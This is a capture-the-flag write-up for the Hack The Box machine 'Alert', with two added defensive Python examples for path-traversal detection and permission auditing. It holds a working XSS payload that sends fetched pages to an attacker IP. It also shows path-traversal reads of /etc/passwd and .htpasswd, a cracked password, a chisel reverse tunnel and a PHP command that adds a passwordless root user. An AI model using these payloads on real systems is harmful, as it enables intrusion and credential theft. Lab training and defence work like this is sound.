Contents
Connect to the HTB server and start the target machine
Information gathering
Scan the target's TCP ports with rustscan
Run nmap script and service scans on the open TCP ports
Run nmap vulnerability and OS scans on the open TCP ports
Scan the target's common UDP ports with nmap
Fuzz subdomains of alert.htb with ffuf
Fuzz paths on alert.htb with gobuster
Initial foothold
Request /messages.php with curl
Open alert.htb directly in a browser
Build a second XSS payload that fetches /messages.php and sends the response back to the attack machine
The local netcat listener receives the callback
Read the Apache configuration file at its default path /etc/apache2/sites-available/000-default.conf
Crack the password hash with john and a wordlist
Log in to the target over SSH with the recovered credentials
Privilege escalation
Inspect the target's internal network connections
Start a chisel server on the attack machine listening for reverse connections
Reach the service through chisel's SOCKS port 1080
Enter the web app directory and inspect file permissions
Use PHP code to run a system command that appends a root user
Request that file from the attack machine with a browser or curl

Connect to the HTB server and start the target machine

Assigned IP: 10.10.16.22
Target IP: 10.10.11.44
Target domain: alert.htb

Information gathering

Scan the target's TCP ports with rustscan

rustscan -a alert.htb -r 1-65535 --ulimit 5000 | tee res

Run nmap script and service scans on the open TCP ports

nmap -sT -p22,80 -sCV -Pn alert.htb

Run nmap vulnerability and OS scans on the open TCP ports

nmap -sT -p22,80 --script=vuln -O -Pn alert.htb

Scan the target's common UDP ports with nmap

nmap -sU --top-ports 20 -Pn alert.htb

Fuzz subdomains of alert.htb with ffuf

ffuf -u http://alert.htb -H "Host: FUZZ.alert.htb" -w ../dictionary/subdomains-top20000.txt -t 50 -fw 20

Fuzz paths on alert.htb with gobuster

gobuster dir -u http://alert.htb -w ../dictionary/Common-dir.txt -x php,txt -t 50

Initial foothold
Request /messages.php with curl

curl -v http://alert.htb/messages.php

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://alert.htb/messages.php
* Host alert.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.44
*   Trying 10.10.11.44:80...
* Connected to alert.htb (10.10.11.44) port 80
* using HTTP/1.x
> GET /messages.php HTTP/1.1
> Host: alert.htb
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sun, 02 Feb 2025 13:47:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 1
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host alert.htb left intact

The response code is 200, but no real content comes back (Content-Length: 1), so there is probably an access allow-list in place.

Open alert.htb directly in a browser

The page accepts an uploaded .md file, so I tried an XSS callback:

<script>
alert(1)
</script>

After uploading it to the target, the popup shows that the JavaScript was parsed and executed.

Build a second XSS payload that fetches /messages.php and sends the response back to the attack machine

<script>
fetch('http://alert.htb/messages.php')
  .then(response => response.text())
  .then(data => { fetch('http://10.10.16.22:1425/?file_content=' + encodeURIComponent(data)); });
</script>

Upload it to the target, click Share Markdown in the bottom-right corner to get the file's URL, go back to the main page, open Contact Us at the top, and send the URL to the target's support team.

The local netcat listener receives the callback

nc -lvnp 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 42838
GET /?file_content=%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

Decode the content with python:

python -c 'import urllib.parse; print(urllib.parse.unquote_plus("%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A"))'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python -c 'import urllib.parse; print(urllib.parse.unquote_plus("%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A"))'
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

Here I noticed the link messages.php?file=2024-03-10_15-48-34.txt: messages.php accepts a file parameter, so I tried to use it to read local files.
<script>
fetch('http://alert.htb/messages.php?file=../../../../../../../../../etc/passwd')
  .then(response => response.text())
  .then(data => { fetch('http://10.10.16.22:1425/?file_content=' + encodeURIComponent(data)); });
</script>

Repeating the steps above, the listener receives the response:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 52334
GET /?file_content=<URL-encoded /etc/passwd, decoded below> HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

Decode it with python:

python -c 'import urllib.parse; print(urllib.parse.unquote_plus("<URL-encoded body from the callback above>"))'

<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>
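Two defender-side checks for the messages.php weakness just used, written in Python as an added example (not code from the writeup or from the box's PHP app): a path-containment function that shows the check the file= handler was missing, and a scan over constructed Apache access-log lines that flags file= values trying to leave the messages directory, including double-encoded ones. The messages directory path is an assumption.

```python
import os
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

MESSAGES_DIR = "/var/www/alert.htb/messages"  # assumed; the writeup never shows it


def resolve_message_file(requested, base_dir=MESSAGES_DIR):
    """Path to serve, or None when the request would leave base_dir.

    The vulnerable handler used the raw file= value; the fix resolves the joined
    path and insists it stays under base_dir and names a bare .txt file, which
    rejects '../' hops and absolute paths alike."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base + os.sep):
        return None
    if os.path.basename(candidate) != requested or not requested.endswith(".txt"):
        return None
    return candidate


TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)|^/")  # '..' path hop or absolute path
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def flag_traversal(log_lines):
    """(client_ip, decoded file value) for messages.php requests whose file=
    parameter tries to escape the messages directory."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/messages.php"):
            continue
        for value in parse_qs(url.query).get("file", []):
            decoded = unquote_plus(value)  # second decode catches ..%252F
            if TRAVERSAL.search(decoded):
                hits.append((ip, decoded))
    return hits


# Constructed access-log lines in Apache 'combined' format (not from the page).
SAMPLE_LOG = [
    '10.10.11.44 - - [02/Feb/2025:13:55:01 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 131 "http://alert.htb/" "HeadlessChrome/122.0"',
    '10.10.11.44 - - [02/Feb/2025:13:56:12 +0000] "GET /messages.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 2456 "http://alert.htb/" "HeadlessChrome/122.0"',
    '10.10.11.44 - - [02/Feb/2025:13:57:40 +0000] "GET /messages.php?file=..%252F..%252Fetc%252Fapache2%252Fsites-available%252F000-default.conf HTTP/1.1" 200 1500 "-" "curl/8.11.1"',
    '10.10.16.22 - - [02/Feb/2025:13:47:13 +0000] "GET /messages.php HTTP/1.1" 200 1 "-" "curl/8.11.1"',
]
```

Running flag_traversal(SAMPLE_LOG) reports the second and third lines only; the legitimate message request and the bare /messages.php probe are left alone.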
Read the Apache configuration file at its default path /etc/apache2/sites-available/000-default.conf

The listener receives:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 41872
GET /?file_content=<URL-encoded configuration, decoded below> HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

Decoding it with CyberChef gives the two virtual hosts, and the second one reveals the .htpasswd path /var/www/statistics.alert.htb/.htpasswd:

<pre><VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

</pre>

Read the .htpasswd file:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 34862
GET /?file_content=%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

Decoding it again with CyberChef yields a credential:

Account: albert
Password hash: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

Save the hash to a file (single quotes keep the shell from expanding the $ fields):

echo '$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' > hash

Crack the password hash with john and a wordlist

john hash --wordlist=../dictionary/rockyou.txt --format=md5crypt-long

This gives the full credential:

Account: albert
Password: manchesterunited

Log in to the target over SSH with the recovered credentials

ssh albert@alert.htb

user.txt is in /home/albert:

albert@alert:~$ ls
user.txt
albert@alert:~$ pwd
/home/albert
albert@alert:~$ cat user.txt
c7756c23c61c6bfe638b9ef0f5dd21a2

Privilege escalation
Inspect the target's internal network connections

ss -tlnp

Port 8080 only accepts local connections, so I forward it to the attack machine with chisel.

Start a chisel server on the attack machine listening for reverse connections

chisel server -p 8888 --reverse

On the target, connect back to the attack machine's chisel server:

./chisel64 client 10.10.16.22:8888 R:socks

The chisel server on the attack machine logs the incoming connection:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# chisel server -p 8888 --reverse
2025/02/02 14:08:39 server: Reverse tunnelling enabled
2025/02/02 14:08:39 server: Fingerprint 25IPnk94XCxFCwNdUr/eR2Fh8awqZSx87sFGotha4
2025/02/02 14:08:39 server: Listening on http://0.0.0.0:8888
2025/02/02 14:09:22 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2025/02/02 14:09:22 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Reach the service through chisel's SOCKS port 1080

The web app is Website Monitor. The target's process list confirms it:

ps -aux | grep 8080

The output shows the process was started by root:

albert@alert:/tmp$ ps -aux | grep 8080
root        1001  0.0  0.6 207256 26552 ?        Ss   09:59   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
albert      5254  0.0  0.0   6432   724 pts/0    S    14:56   0:00 grep --color=auto 8080

Enter the web app directory and inspect file permissions

cd /opt/website-monitor

The listing shows that the monitors directory is writable by other users.

Use PHP code to run a system command that appends a root user

First enter that directory:

cd monitors

Append a root user to /etc/passwd:

echo '<?php exec("echo x0da6h::0:0:x0da6h:/root:/bin/bash >> /etc/passwd"); ?>' > x0da6h.php

Request that file from the attack machine with a browser or curl

Back on the target, /etc/passwd now contains the new user, so switch to it directly:

su x0da6h

albert@alert:~$ su x0da6h
root@alert:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@alert:/home/albert# whoami
root

root.txt is in /root:

root@alert:~# pwd
/root
root@alert:~# ls
root.txt  scripts
root@alert:~# cat root.txt
f8e13577a1c0404ce343be234410e3d1
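An added example, not from the writeup: a Python audit of a document root served by a root-owned process, reporting entries that other users can write to (the monitors directory condition used above) and clearing that bit. The sample tree is constructed in a temporary directory; its file names are assumed, only the writable monitors directory comes from the page.

```python
import os
import stat
import tempfile


def world_writable_paths(doc_root):
    """Return paths (relative to doc_root) whose mode grants write to 'others'.

    A world-writable directory under a root-served document root lets any local
    user drop a .php file that the server then executes as root, which is the
    step the writeup took in /opt/website-monitor/monitors."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(doc_root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue  # a symlink's own bits are always 0o777; judge its target separately
            if mode & stat.S_IWOTH:
                findings.append(os.path.relpath(full, doc_root))
    return sorted(findings)


def remove_other_write(doc_root):
    """Clear the 'others' write bit on every finding and return what was fixed."""
    fixed = world_writable_paths(doc_root)
    for rel in fixed:
        full = os.path.join(doc_root, rel)
        os.chmod(full, stat.S_IMODE(os.stat(full).st_mode) & ~stat.S_IWOTH)
    return fixed


def build_sample_root():
    """Construct a throwaway tree shaped like the page's /opt/website-monitor
    (names assumed; only the 'monitors' permission comes from the writeup)."""
    root = tempfile.mkdtemp(prefix="website-monitor-")
    for name, mode in (("monitors", 0o777), ("config", 0o755)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    index = os.path.join(root, "index.php")
    with open(index, "w") as fh:
        fh.write("<?php echo 'Website Monitor'; ?>\n")
    os.chmod(index, 0o644)
    return root
```

Pointing world_writable_paths at a real document root (for example the one a `php -S ... -t` process serves) is the same call; the constructed tree only exists so the example runs offline.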